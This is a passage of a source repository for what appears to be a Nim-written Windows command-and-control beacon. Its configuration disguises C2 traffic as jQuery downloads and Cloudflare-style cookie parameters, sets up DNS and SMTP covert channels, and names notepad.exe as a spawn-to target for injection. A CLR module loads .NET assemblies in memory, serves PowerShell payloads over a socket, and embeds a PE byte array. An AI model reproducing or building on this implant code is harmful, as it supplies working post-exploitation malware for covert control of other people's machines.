n,r=0;if(C(e)){for(n=e.length;r<n;r++)if(!1===t.call(e[r],r,e[r]))break}else for(r in e)if(!1===t.call(e[r],r,e[r]))break;return e},trim:function(e){return null==e?\"\":(e+\"\").replace(T,\"\")},makeArray:function(e,t){var n=t||[];return null!=e&&(C(Object(e))?w.merge(n,\"string\"==typeof e?[e]:e):s.call(n,e)),n},inArray:function(e,t,n){return null==t?-1:u.call(t,e,n)},merge:function(e,t){for(var n=+t.length,r=0,i=e.length;r<n;r++)e[i++]=t[r];return e.length=i,e},grep:function(e,t,n){for(var r,i=[],o=0,a=e.length,s=!n;o<a;o++)(r=!t(e[o],o))!==s&&i.push(e[o]);return i},map:function(e,t,n){var r,i,o=0,s=[];if(C(e))for(r=e.length;o<r;o++)null!=(i=t(e[o],o,n))&&s.push(i);else for(o in e)null!=(i=t(e[o],o,n))&&s.push(i);return a.apply([],s)},guid:1,support:h}),\"function\"==typeof Symbol&&(w.fn[Symbol.iterator]=n[Symbol.iterator]),w.each(\"Boolean Number String Function Array Date RegExp Object Error Symbol\".split(\" \"),function(e,t){l[\"[object \"+t+\"]\"]=t.toLowerCase()});function C(e){var t=!!e&&\"length\"in e&&e.length,n=x(e);return!g(e)&&!y(e)&&(\"array\"===n||0===t||\"number\"==typeof t&&t>0&&t-1 in e)}var E=function(e){var t,n,r,i,o,a,s,u,l,c,f,p,d,h,g,y,v,m,x,b=\"sizzle\"+1*new Date,w=e.document,T=0,C=0,E=ae(),k=ae(),S=ae(),D=function(e,t){return e===t&&(f=!0),0},N={}.hasOwnProperty,A=[],j=A.pop,q=A.push,L=A.push,H=A.slice,O=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},P=\"\r"
38 |     get_server_append* = "\".(o=t.documentElement,Math.max(t.body[\"scroll\"+e],o[\"scroll\"+e],t.body[\"offset\"+e],o[\"offset\"+e],o[\"client\"+e])):void 0===i?w.css(t,n,s):w.style(t,n,i,s)},t,a?i:void 0,a)}})}),w.each(\"blur focus focusin focusout resize scroll click dblclick mousedown mouseup mousemove mouseover mouseout mouseenter mouseleave change select submit keydown keypress keyup contextmenu\".split(\" \"),function(e,t){w.fn[t]=function(e,n){return arguments.length>0?this.on(t,null,e,n):this.trigger(t)}}),w.fn.extend({hover:function(e,t){return this.mouseenter(e).mouseleave(t||e)}}),w.fn.extend({bind:function(e,t,n){return this.on(e,null,t,n)},unbind:function(e,t){return this.off(e,null,t)},delegate:function(e,t,n,r){return this.on(t,e,n,r)},undelegate:function(e,t,n){return 1===arguments.length?this.off(e,\"**\"):this.off(t,e||\"**\",n)}}),w.proxy=function(e,t){var n,r,i;if(\"string\"==typeof t&&(n=e[t],t=e,e=n),g(e))return r=o.call(arguments,2),i=function(){return e.apply(t||this,r.concat(o.call(arguments)))},i.guid=e.guid=e.guid||w.guid++,i},w.holdReady=function(e){e?w.readyWait++:w.ready(!0)},w.isArray=Array.isArray,w.parseJSON=JSON.parse,w.nodeName=N,w.isFunction=g,w.isWindow=y,w.camelCase=G,w.type=x,w.now=Date.now,w.isNumeric=function(e){var t=w.type(e);return(\"number\"===t||\"string\"===t)&&!isNaN(e-parseFloat(e))},\"function\"==typeof define&&define.amd&&define(\"jquery\",[],function(){return w});var Jt=e.jQuery,Kt=e.$;return w.noConflict=function(t){return e.$===w&&(e.$=Kt),t&&e.jQuery===w&&(e.jQuery=Jt),w},t||(e.jQuery=e.$=w),w});"
39 | 
40 |     post_endpoints*: array[0..0, string] = ["/jquery-3.3.2.min.js"]
41 | 
42 |     get_server_encrypt_type* = get_meta_encrypt_type
43 |     post_server_prepend* = get_server_prepend
44 |     post_server_append* = get_server_append
45 | 
46 |     post_client_prepend* = "data="
47 |     post_client_append* = ""
48 |     post_client_data_encrypt_type* = ["mask", "base64url"]
49 |     post_client_id_type* = "parameter"
50 |     post_client_id_field* = "__cfduid"
51 |     post_client_id_encrypt_type* = [""]
52 |     post_client_id_prepend* = "data="
53 |     post_client_id_append* = ""
54 | 
55 |     # DNS
56 |     server_base_domain* = ".test.local."
57 |     dns_mask* = "0.0.0.0"
58 |     dns_txt* = "api."
59 |     dns_a* = "cdn."
60 |     dns_aaaa* = "www6."
61 |     post_result_prefix* = "post."
62 |     post_metadata_prefix* = "www."
63 | 
64 |     # SMTP
65 |     smtp_client_name* = "client.com"
66 |     smtp_from_base_domain* = "test.local"
67 |     smtp_to_user* = "admin@test.local"
68 |     smtp_data_prefix* = ""
69 |     smtp_data_suffix* = ""
70 |     smtp_metadata_prefix* = "The following messages are encrypted with AES:"
71 |     smtp_callback_prefix* = "The following messages are encrypted with RSA:"
72 |     smtp_empty_data* = ""
73 |     smtp_noop_prefix* = "Trace: "
74 |     smtp_noop_suffix* = ""
75 |     smtp_noop_empty_response* = "250 "
76 | 
77 |     # Command
78 |     # NOTICE: large download_size causes overflow? makes beacon exit unexpectly, larger stack may fix this
79 |     download_size* = 1024 # 5MB
80 |     wait_time* = 5000 # 1s
81 | 
82 |     ## job
83 |     inject_self* = false
84 |     # self
85 |     inject_method* = "a" # for apc
86 |     # spawn
87 |     spawn_to_x86* = "C:\\windows\\syswow64\\notepad.exe"
88 |     spawn_to_x64* = "C:\\windows\\sysnative\\notepad.exe"


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
  1 |                                  Apache License
  2 |                            Version 2.0, January 2004
  3 |                         http://www.apache.org/licenses/
  4 | 
  5 |    TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
  6 | 
  7 |    1. Definitions.
  8 | 
  9 |       "License" shall mean the terms and conditions for use, reproduction,
 10 |       and distribution as defined by Sections 1 through 9 of this document.
 11 | 
 12 |       "Licensor" shall mean the copyright owner or entity authorized by
 13 |       the copyright owner that is granting the License.
 14 | 
 15 |       "Legal Entity" shall mean the union of the acting entity and all
 16 |       other entities that control, are controlled by, or are under common
 17 |       control with that entity. For the purposes of this definition,
 18 |       "control" means (i) the power, direct or indirect, to cause the
 19 |       direction or management of such entity, whether by contract or
 20 |       otherwise, or (ii) ownership of fifty percent (50%) or more of the
 21 |       outstanding shares, or (iii) beneficial ownership of such entity.
 22 | 
 23 |       "You" (or "Your") shall mean an individual or Legal Entity
 24 |       exercising permissions granted by this License.
 25 | 
 26 |       "Source" form shall mean the preferred form for making modifications,
 27 |       including but not limited to software source code, documentation
 28 |       source, and configuration files.
 29 | 
 30 |       "Object" form shall mean any form resulting from mechanical
 31 |       transformation or translation of a Source form, including but
 32 |       not limited to compiled object code, generated documentation,
 33 |       and conversions to other media types.
 34 | 
 35 |       "Work" shall mean the work of authorship, whether in Source or
 36 |       Object form, made available under the License, as indicated by a
 37 |       copyright notice that is included in or attached to the work
 38 |       (an example is provided in the Appendix below).
 39 | 
 40 |       "Derivative Works" shall mean any work, whether in Source or Object
 41 |       form, that is based on (or derived from) the Work and for which the
 42 |       editorial revisions, annotations, elaborations, or other modifications
 43 |       represent, as a whole, an original work of authorship. For the purposes
 44 |       of this License, Derivative Works shall not include works that remain
 45 |       separable from, or merely link (or bind by name) to the interfaces of,
 46 |       the Work and Derivative Works thereof.
 47 | 
 48 |       "Contribution" shall mean any work of authorship, including
 49 |       the original version of the Work and any modifications or additions
 50 |       to that Work or Derivative Works thereof, that is intentionally
 51 |       submitted to Licensor for inclusion in the Work by the copyright owner
 52 |       or by an individual or Legal Entity authorized to submit on behalf of
 53 |       the copyright owner. For the purposes of this definition, "submitted"
 54 |       means any form of electronic, verbal, or written communication sent
 55 |       to the Licensor or its representatives, including but not limited to
 56 |       communication on electronic mailing lists, source code control systems,
 57 |       and issue tracking systems that are managed by, or on behalf of, the
 58 |       Licensor for the purpose of discussing and improving the Work, but
 59 |       excluding communication that is conspicuously marked or otherwise
 60 |       designated in writing by the copyright owner as "Not a Contribution."
 61 | 
 62 |       "Contributor" shall mean Licensor and any individual or Legal Entity
 63 |       on behalf of whom a Contribution has been received by Licensor and
 64 |       subsequently incorporated within the Work.
 65 | 
 66 |    2. Grant of Copyright License. Subject to the terms and conditions of
 67 |       this License, each Contributor hereby grants to You a perpetual,
 68 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 69 |       copyright license to reproduce, prepare Derivative Works of,
 70 |       publicly display, publicly perform, sublicense, and distribute the
 71 |       Work and such Derivative Works in Source or Object form.
 72 | 
 73 |    3. Grant of Patent License. Subject to the terms and conditions of
 74 |       this License, each Contributor hereby grants to You a perpetual,
 75 |       worldwide, non-exclusive, no-charge, royalty-free, irrevocable
 76 |       (except as stated in this section) patent license to make, have made,
 77 |       use, offer to sell, sell, import, and otherwise transfer the Work,
 78 |       where such license applies only to those patent claims licensable
 79 |       by such Contributor that are necessarily infringed by their
 80 |       Contribution(s) alone or by combination of their Contribution(s)
 81 |       with the Work to which such Contribution(s) was submitted. If You
 82 |       institute patent litigation against any entity (including a
 83 |       cross-claim or counterclaim in a lawsuit) alleging that the Work
 84 |       or a Contribution incorporated within the Work constitutes direct
 85 |       or contributory patent infringement, then any patent licenses
 86 |       granted to You under this License for that Work shall terminate
 87 |       as of the date such litigation is filed.
 88 | 
 89 |    4. Redistribution. You may reproduce and distribute copies of the
 90 |       Work or Derivative Works thereof in any medium, with or without
 91 |       modifications, and in Source or Object form, provided that You
 92 |       meet the following conditions:
 93 | 
 94 |       (a) You must give any other recipients of the Work or
 95 |           Derivative Works a copy of this License; and
 96 | 
 97 |       (b) You must cause any modified files to carry prominent notices
 98 |           stating that You changed the files; and
 99 | 
100 |       (c) You must retain, in the Source form of any Derivative Works
101 |           that You distribute, all copyright, patent, trademark, and
102 |           attribution notices from the Source form of the Work,
103 |           excluding those notices that do not pertain to any part of
104 |           the Derivative Works; and
105 | 
106 |       (d) If the Work includes a "NOTICE" text file as part of its
107 |           distribution, then any Derivative Works that You distribute must
108 |           include a readable copy of the attribution notices contained
109 |           within such NOTICE file, excluding those notices that do not
110 |           pertain to any part of the Derivative Works, in at least one
111 |           of the following places: within a NOTICE text file distributed
112 |           as part of the Derivative Works; within the Source form or
113 |           documentation, if provided along with the Derivative Works; or,
114 |           within a display generated by the Derivative Works, if and
115 |           wherever such third-party notices normally appear. The contents
116 |           of the NOTICE file are for informational purposes only and
117 |           do not modify the License. You may add Your own attribution
118 |           notices within Derivative Works that You distribute, alongside
119 |           or as an addendum to the NOTICE text from the Work, provided
120 |           that such additional attribution notices cannot be construed
121 |           as modifying the License.
122 | 
123 |       You may add Your own copyright statement to Your modifications and
124 |       may provide additional or different license terms and conditions
125 |       for use, reproduction, or distribution of Your modifications, or
126 |       for any such Derivative Works as a whole, provided Your use,
127 |       reproduction, and distribution of the Work otherwise complies with
128 |       the conditions stated in this License.
129 | 
130 |    5. Submission of Contributions. Unless You explicitly state otherwise,
131 |       any Contribution intentionally submitted for inclusion in the Work
132 |       by You to the Licensor shall be under the terms and conditions of
133 |       this License, without any additional terms or conditions.
134 |       Notwithstanding the above, nothing herein shall supersede or modify
135 |       the terms of any separate license agreement you may have executed
136 |       with Licensor regarding such Contributions.
137 | 
138 |    6. Trademarks. This License does not grant permission to use the trade
139 |       names, trademarks, service marks, or product names of the Licensor,
140 |       except as required for reasonable and customary use in describing the
141 |       origin of the Work and reproducing the content of the NOTICE file.
142 | 
143 |    7. Disclaimer of Warranty. Unless required by applicable law or
144 |       agreed to in writing, Licensor provides the Work (and each
145 |       Contributor provides its Contributions) on an "AS IS" BASIS,
146 |       WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
147 |       implied, including, without limitation, any warranties or conditions
148 |       of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
149 |       PARTICULAR PURPOSE. You are solely responsible for determining the
150 |       appropriateness of using or redistributing the Work and assume any
151 |       risks associated with Your exercise of permissions under this License.
152 | 
153 |    8. Limitation of Liability. In no event and under no legal theory,
154 |       whether in tort (including negligence), contract, or otherwise,
155 |       unless required by applicable law (such as deliberate and grossly
156 |       negligent acts) or agreed to in writing, shall any Contributor be
157 |       liable to You for damages, including any direct, indirect, special,
158 |       incidental, or consequential damages of any character arising as a
159 |       result of this License or out of the use or inability to use the
160 |       Work (including but not limited to damages for loss of goodwill,
161 |       work stoppage, computer failure or malfunction, or any and all
162 |       other commercial damages or losses), even if such Contributor
163 |       has been advised of the possibility of such damages.
164 | 
165 |    9. Accepting Warranty or Additional Liability. While redistributing
166 |       the Work or Derivative Works thereof, You may choose to offer,
167 |       and charge a fee for, acceptance of support, warranty, indemnity,
168 |       or other liability obligations and/or rights consistent with this
169 |       License. However, in accepting such obligations, You may act only
170 |       on Your own behalf and on Your sole responsibility, not on behalf
171 |       of any other Contributor, and only if You agree to indemnify,
172 |       defend, and hold each Contributor harmless for any liability
173 |       incurred by, or claims asserted against, such Contributor by reason
174 |       of your accepting any such warranty or additional liability.
175 | 
176 |    END OF TERMS AND CONDITIONS
177 | 
178 |    APPENDIX: How to apply the Apache License to your work.
179 | 
180 |       To apply the Apache License to your work, attach the following
181 |       boilerplate notice, with the fields enclosed by brackets "[]"
182 |       replaced with your own identifying information. (Don't include
183 |       the brackets!)  The text should be enclosed in the appropriate
184 |       comment syntax for the file format. We also recommend that a
185 |       file or class name and description of purpose be included on the
186 |       same "printed page" as the copyright notice for easier
187 |       identification within third-party archives.
188 | 
189 |    Copyright [yyyy] [name of copyright owner]
190 | 
191 |    Licensed under the Apache License, Version 2.0 (the "License");
192 |    you may not use this file except in compliance with the License.
193 |    You may obtain a copy of the License at
194 | 
195 |        http://www.apache.org/licenses/LICENSE-2.0
196 | 
197 |    Unless required by applicable law or agreed to in writing, software
198 |    distributed under the License is distributed on an "AS IS" BASIS,
199 |    WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
200 |    See the License for the specific language governing permissions and
201 |    limitations under the License.
202 | 


--------------------------------------------------------------------------------
/cmd/windows/clr.nim:
--------------------------------------------------------------------------------
 1 | import std/[endians, sequtils, strutils, net, strformat, sugar]
 2 | import ../../[utils, config]
 3 | import ../[types, result]
 4 | import winim/clr
 5 | 
 6 | var ps_module: seq[byte]
 7 | proc powershell_module(buf: var seq[byte], cmd: command_type) = 
 8 |     ps_module = buf
 9 | 
10 | proc web_delivery(buf: var seq[byte], cmd: command_type) = 
11 |     var port = parse_int16(buf)
12 |     let socket = newSocket()
13 |     socket.bindAddr(Port(port))
14 |     socket.listen()
15 | 
16 |     var client: net.Socket
17 |     var remote_addr = ""
18 |     # todo, make this async
19 |     socket.acceptAddr(client, remote_addr)
20 |     var req = ""
21 |     discard socket.recv(req, 2048)
22 |     var resp = &"HTTP/1.1 200 OK\r\nContent-Type: application/octet-stream\r\nContent-Length: {ps_module.len}\r\n\r\n"
23 |     socket.send(resp)
24 |     discard socket.send(&ps_module[0], ps_module.len)
25 |     socket.send("\r\n\r\n")
26 |     socket.close()
27 | 
28 | # seems not work, todo
29 | proc exec_asm_cs(asm_buf: seq[byte], asm_args: seq[string]) =
30 |     # var test_buf: array[4608, byte] = [byte 0x4d,0x5a,0x90,0x0,0x3,0x0,0x0,0x0,0x4,0x0,0x0,0x0,0xff,0xff,0x0,0x0,0xb8,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x80,0x0,0x0,0x0,0xe,0x1f,0xba,0xe,0x0,0xb4,0x9,0xcd,0x21,0xb8,0x1,0x4c,0xcd,0x21,0x54,0x68,0x69,0x73,0x20,0x70,0x72,0x6f,0x67,0x72,0x61,0x6d,0x20,0x63,0x61,0x6e,0x6e,0x6f,0x74,0x20,0x62,0x65,0x20,0x72,0x75,0x6e,0x20,0x69,0x6e,0x20,0x44,0x4f,0x53,0x20,0x6d,0x6f,0x64,0x65,0x2e,0xd,0xd,0xa,0x24,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x50,0x45,0x0,0x0,0x4c,0x1,0x3,0x0,0x99,0xdc,0x15,0x93,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xe0,0x0,0x22,0x0,0xb,0x1,0x30,0x0,0x0,0x8,0x0,0x0,0x0,0x8,0x0,0x0,0x0,0x0,0x0,0x0,0xea,0x27,0x0,0x0,0x0,0x20,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x20,0x0,0x0,0x0,0x2,0x0,0x0,0x4,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x6,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x80,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x0,0x0,0x0,0x3,0x0,0x60,0x85,0x0,0x0,0x10,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x10,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x96,0x27,0x0,0x0,0x4f,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0xcc,0x5,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x60,0x0,0x0,0xc,0x0,0x0,0x0,0xec,0x26,0x0,0x0,0x38,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x20,0x0,0x0,0x8,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x8,0x20,0x0,0x0,0x48,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2e,0x74,0x65,0x78,0x74,0x0,0x0,0x0,0xf0,0x7,0x0,0x0,0x0,0x20,0x0,0x0,0x0,0x8,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x20,0x0,0x0,0x60,0x2e,0x72,0x73,0x72,0x63,0x0,0x0,0x0,0xcc,0x5,0x0,0x0,0x0,0x40,0x0,0x0,0x0,0x6,0x0,0x0,0x0,0xa,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x40,0x2e,0x72,0x65,0x6c,0x6f,0x63,0x0,0x0,0xc,0x0,0x0,0x0,0x0,0x60,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x10,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x40,0x0,0x0,0x42,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xca,0x27,0x0,0x0,0x0,0x0,0x0,0x0,0x48,0x0,0x0,0x0,0x2,0x0,0x5,0x0,0x98,0x20,0x0,0x0,0x54,0x6,0x0,0x0,0x3,0x0,0x2,0x0,0x1,0x0,0x0,0x6,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x13,0x30,0x3,0x0,0x33,0x0,0x0,0x0,0x1,0x0,0x0,0x11,0x0,0x2,0x8e,0x16,0xfe,0x1,0xa,0x6,0x2c,0xb,0x72,0x1,0x0,0x0,0x70,0x28,0xf,0x0,0x0,0xa,0x26,0x2,0x8e,0x69,0x17,0xfe,0x1,0xb,0x7,0x2c,0x13,0x72,0x23,0x0,0x0,0x70,0x2,0x16,0x9a,0x28,0x10,0x0,0x0,0xa,0x28,0xf,0x0,0x0,0xa,0x26,0x2a,0x22,0x2,0x28,0x11,0x0,0x0,0xa,0x0,0x2a,0x42,0x53,0x4a,0x42,0x1,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0xc,0x0,0x0,0x0,0x76,0x34,0x2e,0x30,0x2e,0x33,0x30,0x33,0x31,0x39,0x0,0x0,0x0,0x0,0x5,0x0,0x6c,0x0,0x0,0x0,0xf8,0x1,0x0,0x0,0x23,0x7e,0x0,0x0,0x64,0x2,0x0,0x0,0x8c,0x2,0x0,0x0,0x23,0x53,0x74,0x72,0x69,0x6e,0x67,0x73,0x0,0x0,0x0,0x0,0xf0,0x4,0x0,0x0,0x34,0x0,0x0,0x0,0x23,0x55,0x53,0x0,0x24,0x5,0x0,0x0,0x10,0x0,0x0,0x0,0x23,0x47,0x55,0x49,0x44,0x0,0x0,0x0,0x34,0x5,0x0,0x0,0x20,0x1,0x0,0x0,0x23,0x42,0x6c,0x6f,0x62,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2,0x0,0x0,0x1,0x47,0x15,0x2,0x0,0x9,0x0,0x0,0x0,0x0,0xfa,0x1,0x33,0x0,0x16,0x0,0x0,0x1,0x0,0x0,0x0,0x13,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x11,0x0,0x0,0x0,0xe,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x2,0x0,0x0,0x0,0x0,0x0,0x78,0x1,0x1,0x0,0x0,0x0,0x0,0x0,0x6,0x0,0xed,0x0,0x17,0x2,0x6,0x0,0x5a,0x1,0x17,0x2,0x6,0x0,0x21,0x0,0xe5,0x1,0xf,0x0,0x37,0x2,0x0,0x0,0x6,0x0,0x49,0x0,0xbf,0x1,0x6,0x0,0xd0,0x0,0xbf,0x1,0x6,0x0,0xb1,0x0,0xbf,0x1,0x6,0x0,0x41,0x1,0xbf,0x1,0x6,0x0,0xd,0x1,0xbf,0x1,0x6,0x0,0x26,0x1,0xbf,0x1,0x6,0x0,0x60,0x0,0xbf,0x1,0x6,0x0,0x35,0x0,0xf8,0x1,0x6,0x0,0x13,0x0,0xf8,0x1,0x6,0x0,0x94,0x0,0xbf,0x1,0x6,0x0,0x7b,0x0,0x8a,0x1,0x6,0x0,0x67,0x2,0xb3,0x1,0xa,0x0,0x80,0x2,0x4b,0x2,0xa,0x0,0x6e,0x2,0x4b,0x2,0x6,0x0,0xa4,0x1,0xb3,0x1,0x0,0x0,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x1,0x0,0x1,0x0,0x1,0x0,0x10,0x0,0xab,0x1,0xd1,0x1,0x41,0x0,0x1,0x0,0x1,0x0,0x50,0x20,0x0,0x0,0x0,0x0,0x96,0x0,0xba,0x1,0x34,0x0,0x1,0x0,0x8f,0x20,0x0,0x0,0x0,0x0,0x86,0x18,0xdf,0x1,0x6,0x0,0x2,0x0,0x0,0x0,0x1,0x0,0x46,0x2,0x9,0x0,0xdf,0x1,0x1,0x0,0x11,0x0,0xdf,0x1,0x6,0x0,0x19,0x0,0xdf,0x1,0xa,0x0,0x29,0x0,0xdf,0x1,0x10,0x0,0x31,0x0,0xdf,0x1,0x10,0x0,0x39,0x0,0xdf,0x1,0x10,0x0,0x41,0x0,0xdf,0x1,0x10,0x0,0x49,0x0,0xdf,0x1,0x10,0x0,0x51,0x0,0xdf,0x1,0x10,0x0,0x59,0x0,0xdf,0x1,0x10,0x0,0x61,0x0,0xdf,0x1,0x15,0x0,0x69,0x0,0xdf,0x1,0x10,0x0,0x71,0x0,0xdf,0x1,0x10,0x0,0x79,0x0,0xdf,0x1,0x10,0x0,0x89,0x0,0x7b,0x2,0x1f,0x0,0x99,0x0,0x60,0x2,0x25,0x0,0x81,0x0,0xdf,0x1,0x6,0x0,0x2e,0x0,0xb,0x0,0x3a,0x0,0x2e,0x0,0x13,0x0,0x43,0x0,0x2e,0x0,0x1b,0x0,0x62,0x0,0x2e,0x0,0x23,0x0,0x6b,0x0,0x2e,0x0,0x2b,0x0,0x7e,0x0,0x2e,0x0,0x33,0x0,0x7e,0x0,0x2e,0x0,0x3b,0x0,0x7e,0x0,0x2e,0x0,0x43,0x0,0x6b,0x0,0x2e,0x0,0x4b,0x0,0x84,0x0,0x2e,0x0,0x53,0x0,0x7e,0x0,0x2e,0x0,0x5b,0x0,0x7e,0x0,0x2e,0x0,0x63,0x0,0x9c,0x0,0x2e,0x0,0x6b,0x0,0xc6,0x0,0x2e,0x0,0x73,0x0,0xd3,0x0,0x1a,0x0,0x4,0x80,0x0,0x0,0x1,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0xd1,0x1,0x0,0x0,0x4,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2b,0x0,0xa,0x0,0x0,0x0,0x0,0x0,0x4,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x2b,0x0,0x4b,0x2,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x0,0x3c,0x4d,0x6f,0x64,0x75,0x6c,0x65,0x3e,0x0,0x6d,0x73,0x63,0x6f,0x72,0x6c,0x69,0x62,0x0,0x47,0x75,0x69,0x64,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x44,0x65,0x62,0x75,0x67,0x67,0x61,0x62,0x6c,0x65,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x43,0x6f,0x6d,0x56,0x69,0x73,0x69,0x62,0x6c,0x65,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x54,0x69,0x74,0x6c,0x65,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x54,0x72,0x61,0x64,0x65,0x6d,0x61,0x72,0x6b,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x54,0x61,0x72,0x67,0x65,0x74,0x46,0x72,0x61,0x6d,0x65,0x77,0x6f,0x72,0x6b,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x46,0x69,0x6c,0x65,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x43,0x6f,0x6e,0x66,0x69,0x67,0x75,0x72,0x61,0x74,0x69,0x6f,0x6e,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x44,0x65,0x73,0x63,0x72,0x69,0x70,0x74,0x69,0x6f,0x6e,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x43,0x6f,0x6d,0x70,0x69,0x6c,0x61,0x74,0x69,0x6f,0x6e,0x52,0x65,0x6c,0x61,0x78,0x61,0x74,0x69,0x6f,0x6e,0x73,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x50,0x72,0x6f,0x64,0x75,0x63,0x74,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x43,0x6f,0x70,0x79,0x72,0x69,0x67,0x68,0x74,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x41,0x73,0x73,0x65,0x6d,0x62,0x6c,0x79,0x43,0x6f,0x6d,0x70,0x61,0x6e,0x79,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x43,0x6f,0x6d,0x70,0x61,0x74,0x69,0x62,0x69,0x6c,0x69,0x74,0x79,0x41,0x74,0x74,0x72,0x69,0x62,0x75,0x74,0x65,0x0,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x50,0x6f,0x70,0x2e,0x65,0x78,0x65,0x0,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x2e,0x56,0x65,0x72,0x73,0x69,0x6f,0x6e,0x69,0x6e,0x67,0x0,0x53,0x74,0x72,0x69,0x6e,0x67,0x0,0x50,0x72,0x6f,0x67,0x72,0x61,0x6d,0x0,0x53,0x79,0x73,0x74,0x65,0x6d,0x0,0x4d,0x61,0x69,0x6e,0x0,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x65,0x66,0x6c,0x65,0x63,0x74,0x69,0x6f,0x6e,0x0,0x4d,0x65,0x73,0x73,0x61,0x67,0x65,0x42,0x6f,0x78,0x50,0x6f,0x70,0x0,0x2e,0x63,0x74,0x6f,0x72,0x0,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x44,0x69,0x61,0x67,0x6e,0x6f,0x73,0x74,0x69,0x63,0x73,0x0,0x53,0x79,0x73,0x74,0x65,0x6d,0x2e,0x52,0x75,0x6e,0x74,0x69,0x6d,0x65,0x2e,0x49,0x6e,0x74,0x65,0x72,0x6f,0x70,0x53,0